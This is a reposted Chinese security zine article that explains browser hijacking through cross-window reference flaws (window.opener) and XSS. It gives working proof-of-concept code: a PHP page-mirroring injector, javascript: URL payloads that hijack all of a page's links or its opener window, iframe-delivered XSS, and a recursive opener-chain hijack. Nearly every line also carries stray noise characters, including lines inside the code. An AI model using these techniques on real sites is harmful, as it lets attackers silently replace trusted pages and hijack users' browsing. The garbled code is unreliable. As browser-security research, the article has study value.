==Ph4nt0m Security Team==6 Y7 I( r- E/ T0 h
4 B* ^% v2 Y$ x0 W" r Issue 0x03, Phile #0x05 of 0x07
8 Y* U( ^8 V: S \9 @- b / _4 i2 t+ B9 y" T3 O& }! J
( Q$ [9 E0 Z. L6 C6 D% r7 S; z|=---------------------------------------------------------------------------=|
* `" W6 e: d9 B- x5 N& ^|=---------------=[ 利用窗口引用漏洞和XSS漏洞实现浏览器劫持 ]=---------------=|
* N: a, t* ^ e/ O5 ~|=---------------------------------------------------------------------------=|8 z. {9 p1 }6 F" f- F! q3 g
|=---------------------------------------------------------------------------=|% k. y4 V' \1 m0 K9 f
|=------------------------=[ By rayh4c ]=---------------------------=|3 C1 N6 f* @! ^! a, M
|=----------------------=[ <rayh4c#80sec.com> ]=------------------------=|
6 D& S. w2 T4 @$ l4 U% }|=---------------------------------------------------------------------------=|0 ~' L. H: m/ b% N
+ f. y T& l1 |; q) `6 o' r
1 k2 g3 {, R! t% L7 A[目录]6 b0 j3 z; J: s0 l; Y0 f7 H) R& I
% Z& l" z) n3 z; e1 A: L' n: |- k1. 前言
, h2 ]. b* e/ C2. 同源策略简叙
1 a% d* K9 e2 E: i7 V! T8 x3. 理解window对象的同源策略
- C6 \+ r! Y% o7 }5 J0 W7 w4. 窗口引用功能中的同源策略漏洞) b7 [- H% w1 q
4.1 父窗口引用子窗口的同源策略问题
5 h. ]2 C: T% o5 A- S1 m 4.2 子窗口引用父窗口的同源策略问题$ J* n0 Y2 E( g" Y' j' \
5. 利用窗口引用漏洞劫持浏览器
: p% f. B0 S- o8 X6. 利用XSS漏洞劫持浏览器% {0 F* Q; L8 Z8 n& V3 M/ l' d
6.1 正向跨窗口劫持
8 c/ T' T8 _$ C/ E$ `2 Z 6.2 反向跨窗口劫持
9 W6 c7 ~% b+ G/ ?: Z 6.3 极度危险的跨框架窗口引用劫持3 O4 L, s6 w0 T5 I( u' u# e4 P
6.4 极度危险的正反向跨窗口递归劫持 ]* C! `, a* T# z" k$ B9 O n
6.5 完全控制浏览器
( u6 K* H4 }. s- C7. 后记4 S3 T6 W; N# A2 {; e4 V7 G {
8. 参考2 T& } x! }4 V, |2 X$ w% e2 L
; I, w$ `) A. v+ g! C" A5 Z, P2 Q, M- `3 p( e) Z- ^! [; J
一、前言/ a, X2 z- [$ \2 N- T8 T
O. q5 ?3 W/ h/ m. Z 最近国内关于XSS漏洞的技术文档都比较少,所以决定写这篇文档,其中的很多细节和朋6 B: k- f3 L6 W) H" [
友们都沟通讨论很久了,其中包括了我对浏览器同源策略和XSS的一些理解。XSS漏洞从Session' n. ], h& B- S
劫持、钓鱼、XSS WORM等主流攻击方式发展到现在,告诉了大家一个真正的跨站师是不会被
2 v2 b$ G* u( M$ c条条框框所束缚,跨站师们在不断的创新,跨站师们会展示XSS漏洞的所有可能。
5 |5 E( J# F0 Z' o: O- {. {. n1 d
+ B3 K9 ]# x1 K% W7 H8 ^4 W二、同源策略简叙) v+ y( I7 Z" O3 |0 m
+ F; K1 |- H( w7 s 同源策略是浏览器的安全基础,它是浏览器支持的客户端脚本的重要安全标准,我们可以' m! H: ^& ^' ~0 Q
从“源”上了解这一安全标准,按照W3C的标准这个“源”包括域名、协议和端口,各大浏览器都( T% I- K9 f$ c: S2 s& q
曾爆出过很多同源策略漏洞,危害程度各有不同,比如从06年开始流行至今的MS06-014网页木5 ?, j- \3 ]; G; y. S7 @ |2 I
马漏洞都已经完全颠覆了同源策略。这次的文档主要说的是DOM的同源策略(参考2)中的一个
" q: X( z J1 i6 k漏洞,然后从漏洞引申到XSS漏洞如何利用DOM的同源策略特性,最终实现浏览器劫持。$ I Y8 }, l1 R; }# J( R1 X
# @ D2 A6 `. m7 X" x+ W* L1 H( n
3 t4 X( ?+ r; |; c( X, b' [三、理解window对象的同源策略( y/ j& \& P# p5 H, e3 E! Q/ P* o
8 a, g! p" a' h; u* t, I7 s2 t 窗口即指的是浏览器窗口,每个浏览器窗口都可以使用window对象实例来表示,window对
2 z8 L' N3 m3 s* ~象有很多属性和方法,写一个简单的脚本可以历遍出window对象的所有属性和方法:
1 @9 Q7 e: t G6 r6 h/ I0 Y, s! J: Q" F, ]# B& C9 |
--code-------------------------------------------------------------------------3 N. _4 f9 E% B2 R! g
<script language="javascript">7 M& q% v6 M) |
for(p in window) document.write(p+"<br>");
) @& l( T7 m; W1 L</script>
5 t ^ f5 w5 P, L7 q4 ^2 G; b2 e+ ^0 c-------------------------------------------------------------------------------3 [8 x* E( W/ K) d/ j" ~
3 v2 P, s$ |9 v3 Y9 M3 v
这些window对象的属性和方法可以改变窗口的外观和窗口网页的内容,当这些属性和方7 t- D( H. \/ Q) d' Q
法只在一个窗口中使用并不会凸显出安全问题,但是当多个window对象开始互相引用的时候,. M+ s3 P/ g+ i J( D
这些属性和方法就必须遵循同源策略。 A$ \5 Q v" W
4 k- H7 N% S- R6 Y. I/ t5 e
举一个简单的例子,如果在a.com的网页可以调用b.com网页window对象的属性和方法,那6 R# U$ r9 b4 h+ H3 L+ ]6 F
么跨站师就可以随便XSS互联网上任何一个网站了,所以为了避免安全问题,同源策略是必须/ d% A! k6 U! z$ I
的。我们可以把下面的脚本保存为demo.html到本地打开或者丢到远程服务器上进行测试,这
3 ^/ \1 Q# A% `% T1 @2 E7 `个脚本的效果是调用不同源的子窗口window对象的属性和方法,我们会发现location属性的
3 {$ ?4 o: S: _$ ]值类型是空白的,这种情况太特殊了,说明不同源的父窗口引用子窗口window对象的location) x- J8 H2 A3 K4 m8 y
属性并没有被拒绝访问。) N2 [" M: `, S* E5 m
k! Q' E; Q0 ]. k4 j, k i
--demo.html--------------------------------------------------------------------) P4 }0 x3 M* x* k! Y3 F1 @! ~
<script language="javascript"> 6 _( z) H6 ~* Q. D5 X% i. b, ^9 j
function allPrpos(obj) { ! g- u- j# D; {: ^" g
var props = "<table><tr><td>名称</td><td>值</td>"; * I- d" a5 @9 U# o- V
for(var p in obj){
% W) h. W8 w9 _% }9 u; f& v if(typeof(obj[p])=="function"){
/ S8 C& R g& t" y* T obj[p]();
0 A, Y( ?/ g3 h& C$ J* c, p }else{ 5 J/ f+ k/ P) H
try 5 U0 v! R0 j- N- o4 `* A# q) w" s( r
{
5 T1 |; O1 d. T props+="<tr><td>"+p + "</td><td>" + obj[ p ] + "</td></tr>"; ! H0 v! h- S& C/ }7 P
} - v, K8 h# X$ S+ B+ B
catch (ex)
, g7 L- T+ q) w2 k1 E d {
* I0 f& `$ @% k3 A( X" H8 { ! S; N' F3 a3 z$ q! s
props+= "<tr><td>"+p + "</td><td>" +ex.message+"</td></tr>";
2 |, `* O% @9 e' ^) g1 e } 4 p: G- G! y) U4 ?# F3 u0 Y; g& y$ F( N
+ ^, ~2 _$ c" V } & d M+ U( l: E; B
} : s5 F2 p4 X, ?$ u" T# A( ^
7 @5 U) S5 N" I! S w' ~9 [: h+ o: S
document.write(props+"</table>");
. f0 l. o5 q" j) y3 P+ N6 j} ) C. z7 b2 i: W. h8 y
; @" h I& n4 |/ A D
function createWin() {
; c# n `5 w0 x" H# F newWin = window.open ("http://www.google.com"); - d! e) m1 f0 [6 b& O, V4 f
setTimeout(function(){allPrpos(newWin)},2000);
" [' a1 Y4 t/ A, v8 O& w( Z% e}
% n! E% z6 l& ^8 A6 E& Z" o
- u u' y9 b! W, L</script> 7 [; \: N. ]! C. ~) i. s" D6 Z. @0 i
, P. }; m4 l3 W3 f; C/ H( L6 r! d9 \9 `
<button onclick='createWin()'>创建一个非同源子窗口测试</button>
4 N8 i0 `/ T8 ~% n! @0 d( E-------------------------------------------------------------------------------! D/ v4 q7 z1 R/ Q) }3 I- T
" p9 U1 v+ S& J' _" \8 u. r4 V6 Y# H4 x
四、窗口引用功能中的同源策略漏洞
) E. @: a$ X; T& e9 |; J6 T
+ @7 ^* A4 S, ?2 l; B( |4.1 父窗口引用子窗口的同源策略问题8 Y$ I, S) N l% `
$ k H, T& K7 q6 r# m* W 去年我在幻影杂志发过的IE6跨域脚本漏洞,这个问题微软已经发布了ms08-058补丁修复,* R2 `' R, C9 F
但这个漏洞仍然暴露了父窗口引用子窗口的同源策略问题。根据第二部分的测试,我们知道( \% j. U8 H6 H4 U4 @/ a
浏览器并没有阻止父窗口访问非同源子窗口的location属性值,我们可以使用下面的脚本进
7 @/ `- Q) s. H行测试,会发现父窗口可以控制非同源子窗口location属性值。
* ^+ x7 |; n5 f9 D% m
! ^. {; o) ]- h: F" R: T ^--vul1.html--------------------------------------------------------------------
, R, r# W# [& O<script language="javascript">
& q7 w) c% A% O! m; D* ]function createWin() {
: P, G+ r5 q$ `' [3 Y: w newWin = window.open ("http://www.google.com"); # q; A* Y3 D9 `/ ?* C& q
setTimeout(function(){newWin.location="http://www.80sec.com"},2000); , H7 f: Q8 s9 u) y4 n2 K
}
9 C- {2 v( z) v$ y1 r, B</script>
/ G3 N1 W ~: v- T S P9 N( N4 S/ g( e8 Q2 x$ z" W5 j! ~8 P
<button onclick='createWin()'>创建一个非同源子窗口测试</button>
" g- g7 Q r4 O& M* d0 r-------------------------------------------------------------------------------
7 F! D5 B* @. U9 {* I3 _* ?3 {4 A6 h
8 q* }! {3 ~2 x4.2 子窗口引用父窗口的同源策略问题
" T9 t+ d7 G3 }0 w. d% ~$ J# N. d, `( k' d
逆向测试一次会发现子窗口引用父窗口也存在同样的问题,这里为了更方便和直观我使
0 m* O7 x; U( s用javascript伪协议进行验证。子窗口引用父窗口的window对象属性是window.opener,我们
0 S3 F7 _; L. R8 t0 Z/ _7 Q可以随意浏览一个网站点击链接打开N个网页,在这些网页的地址栏注入下面的脚本,你一定
$ X+ h f6 F3 f! W7 o1 X3 X( ]8 g. n会惊奇的发现,不管同源还是非同源的父窗口都转跳到了80SEC网站。
# W1 d# T* c, y6 ^8 K+ z) v3 h
; X. w4 s+ a7 ]--code-------------------------------------------------------------------------% \5 q. J0 f3 k7 Q' \
! a9 ~% B, j H: F
javascript:window.opener.location = "http://www.80sec.com";void(0);
- r$ y& B* U8 h3 i
8 F: G, \4 a# N' I-------------------------------------------------------------------------------3 `, v- W. z- G/ S8 Q1 Y2 g
/ c4 }* `2 c, D0 v$ k% p6 @/ G7 }! w6 Y# x* }( Y
五、利用窗口引用漏洞劫持浏览器' }. m( C1 W4 i- C- r
S! P, @. f. l+ F( e9 O+ r' B 经过上面三个枯燥的测试,我们已经暴露了浏览器一个非常严重的安全问题,非同源的子
l3 ?& x/ J S9 O7 J1 A窗口和父窗口可以互相引用控制window对象的location属性值,并没有严格遵循同源策略,那' Y* [2 Y: [8 @8 }' ]) `9 @: m; ^
么用户在浏览器中的所有点击行为都有可能被跨站师变相控制。
- Z+ p; |" H' T+ V9 S+ w
) ?$ w8 p+ T% C8 D( d. g 我们打开浏览器访问互联网上的各个网站,无时无刻不在点击链接,我们点击链接想要产( \! H+ U8 u' k) a& K! m- O- h
生的结果是去访问我们想要去的URL地址,用户的正常点击只会产生两个结果,打开新窗口或
: Q$ m g. n" z4 l6 K0 J者当前窗口转跳,试想一下你在SNS网站、电子商务网站、BLOG、论坛里点击一个正常的链接0 C. e4 R6 k# D* P6 G
后,打开了一个“无害”的网页,原本浏览的信任网页却已经被悄悄替换了,大家可以联想一下9 B( M4 X1 k) h: ^
会产生什么可怕的后果。
2 s9 E9 Z$ c$ N' \/ \( K, ~; P9 Z$ g9 M' v2 m
下面我写了一个劫持浏览器的小Demo,思路是获取REFERER后生成镜像页面,同时加入我7 {: J, z4 O; G9 Y+ I9 E
们的劫持脚本。比如把这个hjk_ref.php丢到本地服务器上测试,将http://127.0.0.1/hjk_ref.php6 S: Z5 p+ n+ h) t
这样的链接发到任意一个网站上,点击链接打开新窗口,当所有的注意力都停滞在新窗口的时
& E3 N" ?" Q% }7 m候,3秒后一个镜像页面将会悄悄替换链接所在页。按照类似的思路,发挥跨站师的想象力,可$ w/ W& h/ _" V1 I2 T; E5 m
以做更多的事情,所有的一切仅仅是因为点击了一个链接。6 J; D3 \/ b# r$ E1 a" X3 c
6 O0 _0 }1 G. w4 `
--hjk_ref.php------------------------------------------------------------------* Z, J3 R5 Y5 G8 Y2 t% ~( Q
<?php
; h8 Z) o; X5 z% {! z, cif (array_key_exists("HTTP_REFERER", $_SERVER)) {* a7 y P9 D# N0 T
$Url_Mirror = $_SERVER["HTTP_REFERER"];
" z% P5 n! x. N0 ^8 R: ^* Q! w2 @& O}
( d, h8 d$ D! d6 n: Z' o6 @: uif(isset ($_GET['ref'])) {, k3 {' G; l% j2 X _3 {" W! E" w
echo file_get_contents($_GET['ref']) . '<script>alert(\'I had been hijacking your browser!\')</script>';1 S7 J: c |7 F; `- y* f+ O) m
}4 o ]5 h$ V$ z; _8 {: W5 V7 u
?>) K* k* i& z/ Y, S
! i% x, U2 w: |0 j$ a: y<script language="javascript">, O+ v, z0 s- g) F7 C0 q( {% W
setTimeout(function(){window.opener.location=window.location+"?ref=<?echo $Url_Mirror;?>"},3000);
9 X b. h. T! [ L</script>
" M2 K: G! F; c2 ]-------------------------------------------------------------------------------/ l$ ~' K0 }; U* W! J
$ K: D2 N8 [$ c- z
注:各大主流浏览器仅opera和internet explorer 8不存在窗口引用漏洞。6 ^+ _* K! D0 I0 A- {3 y3 ~
! w) u* c. O6 R+ F" ^* B/ q' C2 D; g2 i& u3 j
六、利用XSS漏洞劫持浏览器0 |3 i- n& [0 w7 s7 V" \
3 }: P* b v! j 延续第四部分的思路,这部分将进入本文的一个重要环节.跨站师们都知道XSS漏洞分为1 D$ V4 p3 F$ x
持久和非持久两种,这两种类型的漏洞无论怎么利用都无法跳出窗口的生命周期,窗口关闭后
0 M* c3 G# O/ H Q! c# vXSS漏洞的效果也就完全消失,窗口的限制一直束缚着跨站师们的发挥,我这里将和大家一起
) ^ l; a, C5 \: {讨论跨站师的终极技巧:- ^, z" x+ y: i) S0 f/ w( R2 v
0 p) n% E5 r- P( h( Z
* k+ X2 t9 _, O/ `; O. r
6.1 正向跨窗口劫持7 c7 t/ F% @5 P* J" Y
( Z9 S2 w9 M$ r" e9 k8 b* P
大家可以先试验下hijack_open.js这个脚本,比如打开http://bbs.dvbbs.net/动网论坛
3 ^3 e4 Z; i1 n" N主页,我们在地址栏里复制下面的代码使用伪协议注入hijack_open脚本,然后整个页面的链" z$ t4 ?; g0 j; n. L2 F0 ?! P. B
接就都被劫持住了,点击论坛里的任意一个链接,打开的新窗口都会被注入了一个alert对话- A3 c7 g) H, i. X1 V v
框脚本。 ( B- G: @* |8 L: S( D
/ Q8 V/ x' ?; J% _+ u1 Z$ H; _( i
--hijack_open.js---------------------------------------------------------------
" _6 p6 }9 x: D5 t# B; O4 c `% v9 D# h
javascript:for(i=0;i<document.links.length;i++){document.links.onclick=function(){x=window.open(this.href);setTimeout(function(){try{x.location="javascript:alert('I had been hijacking your browser!')"}catch(e){};return false;},3000);return false;}};void(0);' H) j" I0 _' v2 C5 N
1 \$ T2 ^8 e/ \& D+ J g-------------------------------------------------------------------------------
' d1 q2 y ^- f" P8 Q* l' Y& C+ L8 i+ R: T; ~, B v; n* @8 ?
1 ?& V+ ]. Q! S S( V3 n
6.2 反向跨窗口劫持# V1 o: W. u- J! X4 w, H1 R: w
# K! u% B; i. z$ c
同样我们也可以在动网论坛试验,新打开任意一个版块的窗口,在地址栏里复制下面的代
- b) X4 o$ z3 y& a2 n码使用伪协议注入hijack_opener脚本,我们会发现原来的页面被反向注入了一个alert对话
$ s4 z/ q2 e$ j+ m# r0 Y: D框脚本。
6 y! l9 x+ c/ Z e4 S! T9 l1 x, H5 h2 c7 r9 T6 R4 z) P
--hijack_opener.js-------------------------------------------------------------7 b9 O0 N2 R0 l
1 @1 _- N: R1 d. h/ J" [; y% Rjavascript:window.opener.location="javascript:alert('I had been hijacking your browser!')";void(0);) o, K: A7 X' X/ x8 S
1 x- k( r! @6 K- e/ V/ G5 G% R
------------------------------------------------------------------------------- ?3 @% R; m" \# g. A ?, t; L0 q# Z
! s- U) j: s4 O7 A
6 y8 S v/ I9 p. @, M* P: r6.3 极度危险的跨框架窗口引用劫持; ]3 |; ?1 _* R t, w
" T& m2 H; o+ }+ J, S7 L6 _
非持久型XSS漏洞是在URL参数中注入脚本,一度被认为很鸡肋,一个非持久型的XSS漏洞
% q$ P/ V7 u9 w9 r5 J7 O- ~# ]可能出现URL参数过于冗长等缺点,下面这个window.parent.opener的跨框架窗口引用技巧就
. n t+ C; m( `1 q6 R- U适用于所有的非持久型XSS漏洞,我们可以在一个被攻击者的信任网站上的网页里iframe一个
& x% \' ^( M! t: N$ A非持久型的XSS,如下:
& X- k& D3 v1 [' l( K9 c5 B5 X- b" S6 \6 |* l, x; o, _+ P
<iframe src='http://www.target.com/index.php?vul=xss'width='0' height='0'>, r7 A7 q: v+ @, [. o; o4 ]
4 o3 L w1 }" ~9 u9 b- g) s" s! K 在vul参数中写入下面的hijack_frame_opener脚本,跨站师就可以反向跨框架引用窗口9 }9 e( _- v* f7 a) D. j- g& e
注入脚本。
: y @) I/ K; E# x+ U( D
& U& V- F5 L( v3 j4 L- @& K# h--hijack_frame_opener.js-------------------------------------------------------' p; U* M6 m9 K3 E4 z
<script>; e, f+ ?+ B, v/ A% y* k
window.parent.opener.location="javascript:alert('I had been hijacking your browser!')";1 T7 n- V+ |2 D; G/ X* s4 w
</script>
8 e. _! y) r2 e. d2 |-------------------------------------------------------------------------------
2 r- I0 C- j; b* M) l7 Y
( ]- b0 ^5 l9 x) q/ w, t6 o M1 p& S0 X X1 x
6.4 极度危险的正反向跨窗口递归劫持
% }* v% Y1 g2 q4 m
/ l" q6 T! }4 [+ B3 }- D- J/ } luoluo建议我加上了这一部分,窗口之间的引用关系可能是复杂的,我们可以通过window
. L. b( r4 y& k, W的opener属性链反向递归查找窗口注入XSS脚本,将互相引用过的同域窗口全部劫持,并通过! x, r$ \. ]' q' r; T
异常处理规避之间跨域页面的访问异常,代码如下:
, v% G4 ]& y% t" X5 P0 J3 f0 c( z$ x5 k7 V. g# t$ z+ o1 _* J
--code-------------------------------------------------------------------------' U- D1 v. r8 T ]5 @( h
2 d U K3 c$ z7 mjavascript function(){var w=window;while(w.opener){w=w.opener;try{w.location="javascript:alert('I had been hijacking your browser!');void(1);";}catch(e){}}})();void(0);
0 a( E( [8 y. n: s7 j1 I7 L( S1 Y; D* X9 W4 k+ P5 S( `( p& r
-------------------------------------------------------------------------------
; D4 C+ N1 M- K* e3 b5 I9 Z) b' V. \, _* i/ h8 w! u+ ^
假设页面打开序列有A域->B域->A域的情况,通过对第二个A域页面的反向递归劫持则可) [) m$ h# v8 d4 l: a: K+ I
以劫持B域之前的A域页面,从而实现“隔空打击”。
; Y0 p6 [( q% G0 b7 G
# i7 R4 o, C; w3 T 同理,正向跨窗口劫持也可以实现递归劫持所有同域的链接,对每个打开的被劫持的页面
; T7 J1 ?" [' E, c0 {0 q执行和第一个页面一样的劫持脚本,但是正向递归没法实现反向递归的那种“隔空打击”。
% N' }: x+ U5 Y, D, |# f9 o. x. \- c0 D
结合正向和反向的链式递归劫持,最终我们可以劫持所有的同域页面。, I, I% F t1 [* p
1 n; ~% ^! J7 ]; k) k. W/ Z7 i7 S8 i! s
6.5 完全控制浏览器; C; y C- i8 S
* h& w$ c$ q0 ^& c8 | 一个跨站脚本漏洞的真正意义在程序员的角度是输入和输出问题,而在跨站师的角度则5 @1 O8 p4 F7 Z! Z2 z/ i
是能够进入同源策略了,可以摆脱同源策略的束缚做任何想做的事情。跨站师们可以利用XSS7 U: G) E% z4 ?/ H
漏洞在同源策略允许的范围内再跨页面注入脚本,可以不再为窗口关闭后XSS漏洞的效果消失8 j2 {* t2 h' l( E: \% [
而烦恼,劫持窗口后的跨站师们可以任意发挥,劫持表单,劫持请求,劫持输入等等,我就不再0 q; p$ ~3 @3 c3 \ e# H" R5 e
列举实例。无论是持久型还是非持久型的XSS漏洞都是能够发挥最大的威力的,最后实现跨站
, \$ t5 I9 {, @. V. v师的终极目标 - 完全控制浏览器。
; N# [! @8 S$ e; K( w7 N: O9 J; K7 E9 M
9 p& f5 |: p( Y七、后记
" H/ B5 P" Z, |. |
7 `' \( y. W1 |$ P! c5 K 文章涉及的安全技术全部都是纯研究性质,请不要将这些技术使用在非法途径上。安全0 C x& f1 I; o0 w f( L
与应用永远是一个矛盾体,通往安全的路永远不止一条。感谢对这篇文档的思路和技术给予 G2 |. G" W4 I' R* C8 D) S
过帮助的luoluo、cnqing、linx以及80Sec团队的所有成员。( H( N" Q7 S. q6 G& X
8 k" y' Q# l, _& @% X/ ]0 [$ d0 Z
2 r$ H" b" ?3 C; a
八、参考& i" [% }* x8 ?
' Z( r# F% B9 d! R( S1. http://en.wikipedia.org/wiki/Same_origin_policy
4 G3 {. D# W' {( B% w7 g2. http://code.google.com/p/browser ... licy_for_DOM_access
6 q( T& z( f! Q. [4 o3. http://www.w3.org/TR/Window/
3 v" u, [. | \9 K0 x' a1 ~$ }4 ]- O4. http://www.80sec.com/release/browser-hijacking.txt
" x5 n& s' V1 v( M5. http://www.80sec.com/all-browser-security-alert.html" o a# T$ J2 X7 M7 e! T
6. http://www.80sec.com/ms08-058-attacks-google.html
5 [$ s/ I" T4 `
$ Y. k% n! V# I3 F( d-EOF- |
发表于 2012-9-13 17:10:56
收藏
支持
反对